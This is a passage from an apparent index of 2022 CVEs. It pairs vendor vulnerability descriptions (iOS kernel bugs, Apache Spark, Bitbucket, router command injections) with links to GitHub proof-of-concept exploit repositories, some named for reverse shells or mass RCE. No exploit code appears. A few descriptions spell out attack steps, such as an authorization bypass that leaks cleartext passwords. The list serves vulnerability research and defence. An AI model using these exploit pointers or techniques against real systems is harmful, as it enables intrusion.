The issue was addressed with improved memory handling. This issue is fixed in iOS 15.7 and iPadOS 15.7, iOS 16, macOS Ventura 13, watchOS 9. An app may be able to execute arbitrary code with kernel privileges.
- [ox1111/CVE-2022-32898](https://github.com/ox1111/CVE-2022-32898)
### CVE-2022-32932 (2022-11-01)
The issue was addressed with improved memory handling. This issue is fixed in iOS 15.7.1 and iPadOS 15.7.1, iOS 16.1 and iPadOS 16, watchOS 9.1. An app may be able to execute arbitrary code with kernel privileges.
- [ox1111/CVE-2022-32932](https://github.com/ox1111/CVE-2022-32932)
### CVE-2022-32947 (2022-11-01)
The issue was addressed with improved memory handling. This issue is fixed in iOS 16.1 and iPadOS 16, macOS Ventura 13, watchOS 9.1. An app may be able to execute arbitrary code with kernel privileges.
- [asahilina/agx-exploit](https://github.com/asahilina/agx-exploit)
### CVE-2022-32988 (2022-06-30)
Cross Site Scripting (XSS) vulnerability in router Asus DSL-N14U-B1 1.1.2.3_805 via the "*list" parameters (e.g. filter_lwlist, keyword_rulelist, etc) in every ".asp" page containing a list of stored strings. The following asp files are affected: (1) cgi-bin/APP_Installation.asp, (2) cgi-bin/Advanced_ACL_Content.asp, (3) cgi-bin/Advanced_ADSL_Content.asp, (4) cgi-bin/Advanced_ASUSDDNS_Content.asp, (5) cgi-bin/Advanced_AiDisk_ftp.asp, (6) cgi-bin/Advanced_AiDisk_samba.asp, (7) cgi-bin/Advanced_DSL_Content.asp, (8) cgi-bin/Advanced_Firewall_Content.asp, (9) cgi-bin/Advanced_FirmwareUpgrade_Content.asp, (10) cgi-bin/Advanced_GWStaticRoute_Content.asp, (11) cgi-bin/Advanced_IPTV_Content.asp, (12) cgi-bin/Advanced_IPv6_Content.asp, (13) cgi-bin/Advanced_KeywordFilter_Content.asp, (14) cgi-bin/Advanced_LAN_Content.asp, (15) cgi-bin/Advanced_Modem_Content.asp, (16) cgi-bin/Advanced_PortTrigger_Content.asp, (17) cgi-bin/Advanced_QOSUserPrio_Content.asp, (18) cgi-bin/Advanced_QOSUserRules_Content.asp, (19) cgi-bin/Advanced_SettingBackup_Content.asp, (20) cgi-bin/Advanced_System_Content.asp, (21) cgi-bin/Advanced_URLFilter_Content.asp, (22) cgi-bin/Advanced_VPN_PPTP.asp, (23) cgi-bin/Advanced_VirtualServer_Content.asp, (24) cgi-bin/Advanced_WANPort_Content.asp, (25) cgi-bin/Advanced_WAdvanced_Content.asp, (26) cgi-bin/Advanced_WMode_Content.asp, (27) cgi-bin/Advanced_WWPS_Content.asp, (28) cgi-bin/Advanced_Wireless_Content.asp, (29) cgi-bin/Bandwidth_Limiter.asp, (30) cgi-bin/Guest_network.asp, (31) cgi-bin/Main_AccessLog_Content.asp, (32) cgi-bin/Main_AdslStatus_Content.asp, (33) cgi-bin/Main_Spectrum_Content.asp, (34) cgi-bin/Main_WebHistory_Content.asp, (35) cgi-bin/ParentalControl.asp, (36) cgi-bin/QIS_wizard.asp, (37) cgi-bin/QoS_EZQoS.asp, (38) cgi-bin/aidisk.asp, (39) cgi-bin/aidisk/Aidisk-1.asp, (40) cgi-bin/aidisk/Aidisk-2.asp, (41) cgi-bin/aidisk/Aidisk-3.asp, (42) cgi-bin/aidisk/Aidisk-4.asp, (43) cgi-bin/blocking.asp, (44) cgi-bin/cloud_main.asp, (45) cgi-bin/cloud_router_sync.asp, (46) cgi-bin/cloud_settings.asp, (47) cgi-bin/cloud_sync.asp, (48) cgi-bin/device-map/DSL_dashboard.asp, (49) cgi-bin/device-map/clients.asp, (50) cgi-bin/device-map/disk.asp, (51) cgi-bin/device-map/internet.asp, (52) cgi-bin/error_page.asp, (53) cgi-bin/index.asp, (54) cgi-bin/index2.asp, (55) cgi-bin/qis/QIS_PTM_manual_setting.asp, (56) cgi-bin/qis/QIS_admin_pass.asp, (57) cgi-bin/qis/QIS_annex_setting.asp, (58) cgi-bin/qis/QIS_bridge_cfg_tmp.asp, (59) cgi-bin/qis/QIS_detect.asp, (60) cgi-bin/qis/QIS_finish.asp, (61) cgi-bin/qis/QIS_ipoa_cfg_tmp.asp, (62) cgi-bin/qis/QIS_manual_setting.asp, (63) cgi-bin/qis/QIS_mer_cfg.asp, (64) cgi-bin/qis/QIS_mer_cfg_tmp.asp, (65) cgi-bin/qis/QIS_ppp_cfg.asp, (66) cgi-bin/qis/QIS_ppp_cfg_tmp.asp, (67) cgi-bin/qis/QIS_wireless.asp, (68) cgi-bin/query_wan_status.asp, (69) cgi-bin/query_wan_status2.asp, and (70) cgi-bin/start_apply.asp.
- [FedericoHeichou/CVE-2022-32988](https://github.com/FedericoHeichou/CVE-2022-32988)
### CVE-2022-33075 (2022-07-05)
A stored cross-site scripting (XSS) vulnerability in the Add Classification function of Zoo Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via unspecified vectors.
- [angelopioamirante/CVE-2022-33075](https://github.com/angelopioamirante/CVE-2022-33075)
### CVE-2022-33082 (2022-06-30)
An issue in the AST parser (ast/compile.go) of Open Policy Agent v0.10.2 allows attackers to cause a Denial of Service (DoS) via a crafted input.
- [cyberqueenmeg/cve-2022-33082-exploit](https://github.com/cyberqueenmeg/cve-2022-33082-exploit)
### CVE-2022-33174 (2022-06-13)
Power Distribution Units running on Powertek firmware (multiple brands) before 3.30.30 allows remote authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext.
- [Henry4E36/CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174)
### CVE-2022-33679 (2022-09-13)
Windows Kerberos Elevation of Privilege Vulnerability
- [Bdenneu/CVE-2022-33679](https://github.com/Bdenneu/CVE-2022-33679)
- [Blyth0He/CVE-2022-33679](https://github.com/Blyth0He/CVE-2022-33679)
- [Amulab/CVE-2022-33679](https://github.com/Amulab/CVE-2022-33679)
- [notareaperbutDR34P3r/Kerberos_CVE-2022-33679](https://github.com/notareaperbutDR34P3r/Kerberos_CVE-2022-33679)
### CVE-2022-33891 (2022-07-18)
The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
- [W01fh4cker/cve-2022-33891](https://github.com/W01fh4cker/cve-2022-33891)
- [HuskyHacks/cve-2022-33891](https://github.com/HuskyHacks/cve-2022-33891)
- [west-wind/CVE-2022-33891](https://github.com/west-wind/CVE-2022-33891)
- [AkbarTrilaksana/cve-2022-33891](https://github.com/AkbarTrilaksana/cve-2022-33891)
- [llraudseppll/cve-2022-33891](https://github.com/llraudseppll/cve-2022-33891)
- [AmoloHT/CVE-2022-33891](https://github.com/AmoloHT/CVE-2022-33891)
- [DrLinuxOfficial/CVE-2022-33891](https://github.com/DrLinuxOfficial/CVE-2022-33891)
- [Vulnmachines/Apache-spark-CVE-2022-33891](https://github.com/Vulnmachines/Apache-spark-CVE-2022-33891)
- [ps-interactive/lab_security_apache_spark_emulation_detection](https://github.com/ps-interactive/lab_security_apache_spark_emulation_detection)
- [elsvital/cve-2022-33891-fix](https://github.com/elsvital/cve-2022-33891-fix)
- [K3ysTr0K3R/CVE-2022-33891-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-33891-EXPLOIT)
### CVE-2022-33980 (2022-07-06)
Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation. Starting with version 2.4 and continuing through 2.7, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Configuration 2.8.0, which disables the problematic interpolators by default.
- [tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE](https://github.com/tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE)
- [HKirito/CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980)
- [sammwyy/CVE-2022-33980-POC](https://github.com/sammwyy/CVE-2022-33980-POC)
- [P0lar1ght/CVE-2022-33980-POC](https://github.com/P0lar1ght/CVE-2022-33980-POC)
- [joseluisinigo/riskootext4shell](https://github.com/joseluisinigo/riskootext4shell)
### CVE-2022-34024 (2022-07-19)
Barangay Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the resident module editing function at /bmis/pages/resident/resident.php.
- [sorabug/bug_report](https://github.com/sorabug/bug_report)
### CVE-2022-34169 (2022-07-19)
The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan.
- [bor8/CVE-2022-34169](https://github.com/bor8/CVE-2022-34169)
- [flowerwind/AutoGenerateXalanPayload](https://github.com/flowerwind/AutoGenerateXalanPayload)
### CVE-2022-34265 (2022-07-04)
An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.
- [aeyesec/CVE-2022-34265](https://github.com/aeyesec/CVE-2022-34265)
- [traumatising/CVE-2022-34265](https://github.com/traumatising/CVE-2022-34265)
- [ZhaoQi99/CVE-2022-34265](https://github.com/ZhaoQi99/CVE-2022-34265)
- [lnwza0x0a/CTF_Django_CVE-2022-34265](https://github.com/lnwza0x0a/CTF_Django_CVE-2022-34265)
### CVE-2022-34298 (2022-06-22)
The NT auth module in OpenAM before 14.6.6 allows a "replace Samba username attack."
- [watchtowrlabs/CVE-2022-34298](https://github.com/watchtowrlabs/CVE-2022-34298)
### CVE-2022-34527 (2022-07-29)
D-Link DSL-3782 v1.03 and below was discovered to contain a command injection vulnerability via the function byte_4C0160.
- [FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection)
### CVE-2022-34556 (2022-07-28)
PicoC v3.2.2 was discovered to contain a NULL pointer dereference at variable.c.
- [Halcy0nic/CVE-2022-34556](https://github.com/Halcy0nic/CVE-2022-34556)
### CVE-2022-34683 (2022-12-30)
NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service.
- [gmh5225/CVE-2022-34683](https://github.com/gmh5225/CVE-2022-34683)
### CVE-2022-34715 (2022-08-09)
Windows Network File System Remote Code Execution Vulnerability
- [Starssgo/CVE-2022-34715-POC](https://github.com/Starssgo/CVE-2022-34715-POC)
### CVE-2022-34718 (2022-09-13)
Windows TCP/IP Remote Code Execution Vulnerability
- [SecLabResearchBV/CVE-2022-34718-PoC](https://github.com/SecLabResearchBV/CVE-2022-34718-PoC)
### CVE-2022-34753 (2022-07-13)
A CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause remote root exploit when the command is compromised. Affected Products: SpaceLogic C-Bus Home Controller (5200WHC2), formerly known as C-Bus Wiser Homer Controller MK2 (V1.31.460 and prior)
- [K3ysTr0K3R/CVE-2022-34753-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-34753-EXPLOIT)
### CVE-2022-34913 (2022-07-02)
md2roff 1.7 has a stack-based buffer overflow via a Markdown file containing a large number of consecutive characters to be processed. NOTE: the vendor's position is that the product is not intended for untrusted input
- [Halcy0nic/CVE-2022-34913](https://github.com/Halcy0nic/CVE-2022-34913)
### CVE-2022-34918 (2022-07-04)
An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.
- [randorisec/CVE-2022-34918-LPE-PoC](https://github.com/randorisec/CVE-2022-34918-LPE-PoC)
- [merlinepedra25/CVE-2022-34918-LPE-PoC](https://github.com/merlinepedra25/CVE-2022-34918-LPE-PoC)
- [merlinepedra/CVE-2022-34918-LPE-PoC](https://github.com/merlinepedra/CVE-2022-34918-LPE-PoC)
- [linulinu/CVE-2022-34918](https://github.com/linulinu/CVE-2022-34918)
- [veritas501/CVE-2022-34918](https://github.com/veritas501/CVE-2022-34918)
### CVE-2022-34919 (2022-08-23)
The file upload wizard in Zengenti Contensis Classic before 15.2.1.79 does not correctly check that a user has authenticated. By uploading a crafted aspx file, it is possible to execute arbitrary commands.
- [ahajnik/CVE-2022-34919](https://github.com/ahajnik/CVE-2022-34919)
### CVE-2022-34961 (2022-07-25)
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Users Timeline module.
- [bypazs/CVE-2022-34961](https://github.com/bypazs/CVE-2022-34961)
### CVE-2022-34962 (2022-07-25)
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Group Timeline module.
- [bypazs/CVE-2022-34962](https://github.com/bypazs/CVE-2022-34962)
### CVE-2022-34963 (2022-07-25)
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the News Feed module.
- [bypazs/CVE-2022-34963](https://github.com/bypazs/CVE-2022-34963)
### CVE-2022-34970 (2022-08-04)
Crow before 1.0+4 has a heap-based buffer overflow via the function qs_parse in query_string.h. On successful exploitation this vulnerability allows attackers to remotely execute arbitrary code in the context of the vulnerable service.
- [0xhebi/CVE-2022-34970](https://github.com/0xhebi/CVE-2022-34970)
### CVE-2022-35131 (2022-07-25)
Joplin v2.8.8 allows attackers to execute arbitrary commands via a crafted payload injected into the Node titles.
- [ly1g3/Joplin-CVE-2022-35131](https://github.com/ly1g3/Joplin-CVE-2022-35131)
### CVE-2022-35405 (2022-07-19)
Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510 are vulnerable to unauthenticated remote code execution. (This also affects ManageEngine Access Manager Plus before 4303 with authentication.)
- [viniciuspereiras/CVE-2022-35405](https://github.com/viniciuspereiras/CVE-2022-35405)
### CVE-2022-35411 (2022-07-08)
rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer: pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.
- [fuzzlove/CVE-2022-35411](https://github.com/fuzzlove/CVE-2022-35411)
### CVE-2022-35416 (2022-07-11)
H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS.
- [safe3s/CVE-2022-35416](https://github.com/safe3s/CVE-2022-35416)
### CVE-2022-35500 (2022-11-23)
Amasty Blog 2.10.3 is vulnerable to Cross Site Scripting (XSS) via leave comment functionality.
- [afine-com/CVE-2022-35500](https://github.com/afine-com/CVE-2022-35500)
### CVE-2022-35501 (2022-11-23)
Stored Cross-site Scripting (XSS) exists in the Amasty Blog Pro 2.10.3 and 2.10.4 plugin for Magento 2 because of the duplicate post function.
- [afine-com/CVE-2022-35501](https://github.com/afine-com/CVE-2022-35501)
### CVE-2022-35513 (2022-09-07)
The Blink1Control2 application <= 2.2.7 uses weak password encryption and an insecure method of storage.
- [p1ckzi/CVE-2022-35513](https://github.com/p1ckzi/CVE-2022-35513)
### CVE-2022-35649 (2022-07-25)
The vulnerability was found in Moodle, occurs due to improper input validation when parsing PostScript code. An omitted execution parameter results in a remote code execution risk for sites running GhostScript versions older than 9.50. Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
- [antoinenguyen-09/CVE-2022-35649](https://github.com/antoinenguyen-09/CVE-2022-35649)
### CVE-2022-35698 (2022-10-14)
Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by a Stored Cross-site Scripting vulnerability. Exploitation of this issue does not require user interaction and could result in a post-authentication arbitrary code execution.
- [EmicoEcommerce/Magento-APSB22-48-Security-Patches](https://github.com/EmicoEcommerce/Magento-APSB22-48-Security-Patches)
### CVE-2022-35737 (2022-08-03)
SQLite 1.0.12 through 3.39.x before 3.39.2 sometimes allows an array-bounds overflow if billions of bytes are used in a string argument to a C API.
- [gmh5225/CVE-2022-35737](https://github.com/gmh5225/CVE-2022-35737)
- [rvermeulen/codeql-cve-2022-35737](https://github.com/rvermeulen/codeql-cve-2022-35737)
### CVE-2022-35841 (2022-09-13)
Windows Enterprise App Management Service Remote Code Execution Vulnerability
- [Wack0/CVE-2022-35841](https://github.com/Wack0/CVE-2022-35841)
### CVE-2022-35899 (2022-07-21)
There is an unquoted service path in ASUSTeK Aura Ready Game SDK service (GameSDK.exe) 1.0.0.4. This might allow a local user to escalate privileges by creating a %PROGRAMFILES(X86)%\ASUS\GameSDK.exe file.
- [angelopioamirante/CVE-2022-35899](https://github.com/angelopioamirante/CVE-2022-35899)
### CVE-2022-35914 (2022-09-19)
/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.
- [cosad3s/CVE-2022-35914-poc](https://github.com/cosad3s/CVE-2022-35914-poc)
- [Lzer0Kx01/CVE-2022-35914](https://github.com/Lzer0Kx01/CVE-2022-35914)
- [6E6L6F/CVE-2022-35914](https://github.com/6E6L6F/CVE-2022-35914)
- [0xGabe/CVE-2022-35914](https://github.com/0xGabe/CVE-2022-35914)
- [Johnermac/CVE-2022-35914](https://github.com/Johnermac/CVE-2022-35914)
- [senderend/CVE-2022-35914](https://github.com/senderend/CVE-2022-35914)
- [noxlumens/CVE-2022-35914_poc](https://github.com/noxlumens/CVE-2022-35914_poc)
- [btar1gan/exploit_CVE-2022-35914](https://github.com/btar1gan/exploit_CVE-2022-35914)
### CVE-2022-35919 (2022-08-01)
MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. In affected versions all 'admin' users authorized for `admin:ServerUpdate` can selectively trigger an error that in response, returns the content of the path requested. Any normal OS system would allow access to contents at any arbitrary paths that are readable by MinIO process. Users are advised to upgrade. Users unable to upgrade may disable ServerUpdate API by denying the `admin:ServerUpdate` action for your admin users via IAM policies.
- [ifulxploit/Minio-Security-Vulnerability-Checker](https://github.com/ifulxploit/Minio-Security-Vulnerability-Checker)
### CVE-2022-36067 (2022-09-06)
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. In versions prior to version 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.11 of vm2. There are no known workarounds.
- [0x1nsomnia/CVE-2022-36067-vm2-POC-webapp](https://github.com/0x1nsomnia/CVE-2022-36067-vm2-POC-webapp)
- [Prathamrajgor/Exploit-For-CVE-2022-36067](https://github.com/Prathamrajgor/Exploit-For-CVE-2022-36067)
### CVE-2022-36162
- [MaherAzzouzi/CVE-2022-36162](https://github.com/MaherAzzouzi/CVE-2022-36162)
### CVE-2022-36163
- [MaherAzzouzi/CVE-2022-36163](https://github.com/MaherAzzouzi/CVE-2022-36163)
### CVE-2022-36193 (2022-11-28)
SQL injection in School Management System 1.0 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries.
- [G37SYS73M/CVE-2022-36193](https://github.com/G37SYS73M/CVE-2022-36193)
### CVE-2022-36200 (2022-08-29)
In FiberHome VDSL2 Modem HG150-Ub_V3.0, Credentials of Admin are submitted in URL, which can be logged/sniffed.
- [afaq1337/CVE-2022-36200](https://github.com/afaq1337/CVE-2022-36200)
### CVE-2022-36231 (2023-02-23)
pdf_info 0.5.3 is vulnerable to Command Execution because the Ruby code uses backticks instead of Open3.
- [affix/CVE-2022-36231](https://github.com/affix/CVE-2022-36231)
### CVE-2022-36234 (2022-07-28)
SimpleNetwork TCP Server commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 was discovered to contain a double free vulnerability which is exploited via crafted TCP packets.
- [Halcy0nic/CVE-2022-36234](https://github.com/Halcy0nic/CVE-2022-36234)
### CVE-2022-36267 (2022-08-08)
In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists a Unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious http request by injecting code in one of the parameters allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi that accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.
- [0xNslabs/CVE-2022-36267-PoC](https://github.com/0xNslabs/CVE-2022-36267-PoC)
### CVE-2022-36271 (2022-09-07)
Outbyte PC Repair Installation File 1.7.112.7856 is vulnerable to Dll Hijacking. iertutil.dll is missing so an attacker can use a malicious dll with same name and can get admin privileges.
- [SaumyajeetDas/POC-of-CVE-2022-36271](https://github.com/SaumyajeetDas/POC-of-CVE-2022-36271)
### CVE-2022-36432 (2022-11-17)
The Preview functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 uses eval unsafely. This allows attackers to perform Cross-site Scripting attacks on admin panel users by manipulating the generated preview application response.
- [afine-com/CVE-2022-36432](https://github.com/afine-com/CVE-2022-36432)
### CVE-2022-36433 (2022-11-29)
The blog-post creation functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 allows injection of JavaScript code in the short_content and full_content fields, leading to XSS attacks against admin panel users via posts/preview or posts/save.
- [afine-com/CVE-2022-36433](https://github.com/afine-com/CVE-2022-36433)
### CVE-2022-36446 (2022-07-25)
software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command.
- [p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE)
- [emirpolatt/CVE-2022-36446](https://github.com/emirpolatt/CVE-2022-36446)
- [Kang3639/CVE-2022-36446](https://github.com/Kang3639/CVE-2022-36446)
### CVE-2022-36532 (2022-09-16)
Bolt CMS contains a vulnerability in version 5.1.12 and below that allows an authenticated user with the ROLE_EDITOR privileges to upload and rename a malicious file to achieve remote code execution.
- [lutrasecurity/CVE-2022-36532](https://github.com/lutrasecurity/CVE-2022-36532)
### CVE-2022-36537 (2022-08-26)
ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader.
- [agnihackers/CVE-2022-36537-EXPLOIT](https://github.com/agnihackers/CVE-2022-36537-EXPLOIT)
- [Malwareman007/CVE-2022-36537](https://github.com/Malwareman007/CVE-2022-36537)
### CVE-2022-36539 (2022-09-07)
WeDayCare B.V Ouderapp before v1.1.22 allows attackers to alter the ID value within intercepted calls to gain access to data of other parents and children.
- [Fopje/CVE-2022-36539](https://github.com/Fopje/CVE-2022-36539)
### CVE-2022-36553 (2022-08-29)
Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.
- [0xNslabs/CVE-2022-36553-PoC](https://github.com/0xNslabs/CVE-2022-36553-PoC)
### CVE-2022-36663 (2022-09-06)
Gluu Oxauth before v4.4.1 allows attackers to execute blind SSRF (Server-Side Request Forgery) attacks via a crafted request_uri parameter.
- [aqeisi/CVE-2022-36663-PoC](https://github.com/aqeisi/CVE-2022-36663-PoC)
### CVE-2022-36752 (2022-07-28)
png2webp v1.0.4 was discovered to contain an out-of-bounds write via the function w2p. This vulnerability is exploitable via a crafted png file.
- [Halcy0nic/CVE-2022-36752](https://github.com/Halcy0nic/CVE-2022-36752)
### CVE-2022-36779 (2022-09-13)
PROSCEND - PROSCEND / ADVICE .Ltd - G/5G Industrial Cellular Router (with GPS)4 Unauthenticated OS Command Injection Proscend M330-w / M33-W5 / M350-5G / M350-W5G / M350-6 / M350-W6 / M301-G / M301-GW ADVICE ICR 111WG / https://www.proscend.com/en/category/industrial-Cellular-Router/industrial-Cellular-Router.html https://cdn.shopify.com/s/files/1/0036/9413/3297/files/ADVICE_Industrial_4G_LTE_Cellular_Router_ICR111WG.pdf?v=1620814301
- [rootDR/CVE-2022-36779](https://github.com/rootDR/CVE-2022-36779)
- [EmadYaY/CVE-2022-36779](https://github.com/EmadYaY/CVE-2022-36779)
### CVE-2022-36804 (2022-08-25)
Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.
- [notdls/CVE-2022-36804](https://github.com/notdls/CVE-2022-36804)
- [notxesh/CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC)
- [JRandomSage/CVE-2022-36804-MASS-RCE](https://github.com/JRandomSage/CVE-2022-36804-MASS-RCE)
- [benjaminhays/CVE-2022-36804-PoC-Exploit](https://github.com/benjaminhays/CVE-2022-36804-PoC-Exploit)
- [Vulnmachines/bitbucket-cve-2022-36804](https://github.com/Vulnmachines/bitbucket-cve-2022-36804)
- [kljunowsky/CVE-2022-36804-POC](https://github.com/kljunowsky/CVE-2022-36804-POC)
- [Chocapikk/CVE-2022-36804-ReverseShell](https://github.com/Chocapikk/CVE-2022-36804-ReverseShell)
- [khal4n1/CVE-2022-36804](https://github.com/khal4n1/CVE-2022-36804)
- [0xEleven/CVE-2022-36804-ReverseShell](https://github.com/0xEleven/CVE-2022-36804-ReverseShell)
- [tahtaciburak/cve-2022-36804](https://github.com/tahtaciburak/cve-2022-36804)
- [Inplex-sys/CVE-2022-36804](https://github.com/Inplex-sys/CVE-2022-36804)
- [ColdFusionX/CVE-2022-36804](https://github.com/ColdFusionX/CVE-2022-36804)
- [devengpk/CVE-2022-36804](https://github.com/devengpk/CVE-2022-36804)
- [walnutsecurity/cve-2022-36804](https://github.com/walnutsecurity/cve-2022-36804)
- [imbas007/Atlassian-Bitbucket-CVE-2022-36804](https://github.com/imbas007/Atlassian-Bitbucket-CVE-2022-36804)
### CVE-2022-36944 (2022-09-23)
Scala 2.13.x before 2.13.9 has a Java deserialization chain in its JAR file. On its own, it cannot be exploited. There is only a risk in conjunction with Java object deserialization within an application. In such situations, it allows attackers to erase contents of arbitrary files, make network connections, or possibly run arbitrary code (specifically, Function0 functions) via a gadget chain.
- [yarocher/lazylist-cve-poc](https://github.com/yarocher/lazylist-cve-poc)
### CVE-2022-36946 (2022-07-27)
nfqnl_mangle in net/netfilter/nfnetlink_queue.c in the Linux kernel through 5.18.14 allows remote attackers to cause a denial of service (panic) because, in the case of an nf_queue verdict with a one-byte nfta_payload attribute, an skb_pull can encounter a negative skb->len.
- [Pwnzer0tt1/CVE-2022-36946](https://github.com/Pwnzer0tt1/CVE-2022-36946)
- [Satheesh575555/linux-4.19.72_CVE-2022-36946](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-36946)
### CVE-2022-37017 (2022-12-01)
Symantec Endpoint Protection (Windows) agent, prior to 14.3 RU6/14.3 RU5 Patch 1, may be susceptible to a Security Control Bypass vulnerability, which is a type of issue that can potentially allow a threat actor to circumvent existing security controls. This CVE applies narrowly to the Client User Interface Password protection and Policy Import/Export Password protection, if it has been enabled.
- [apeppels/CVE-2022-37017](https://github.com/apeppels/CVE-2022-37017)
### CVE-2022-37032 (2022-09-19)
An out-of-bounds read in the BGP daemon of FRRouting FRR before 8.4 may lead to a segmentation fault and denial of service. This occurs in bgp_capability_msg_parse in bgpd/bgp_packet.c.
- [spwpun/CVE-2022-37032](https://github.com/spwpun/CVE-2022-37032)
### CVE-2022-37042 (2022-08-11)
Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.
- [GreyNoise-Intelligence/Zimbra_CVE-2022-37042-_CVE-2022-27925](https://github.com/GreyNoise-Intelligence/Zimbra_CVE-2022-37042-_CVE-2022-27925)
- [aels/CVE-2022-37042](https://github.com/aels/CVE-2022-37042)
- [0xf4n9x/CVE-2022-37042](https://github.com/0xf4n9x/CVE-2022-37042)
### CVE-2022-37177 (2022-08-29)
HireVue Hiring Platform V1.0 suffers from Use of a Broken or Risky Cryptographic Algorithm. NOTE: this is disputed by the vendor for multiple reasons, e.g., it is inconsistent with CVE ID assignment rules for cloud services, and no product with version V1.0 exists. Furthermore, the rail-fence cipher has been removed, and TLS 1.2 is now used for encryption.
- [JC175/CVE-2022-37177](https://github.com/JC175/CVE-2022-37177)
### CVE-2022-37201 (2022-09-15)
JFinal CMS 5.1.0 is vulnerable to SQL Injection.
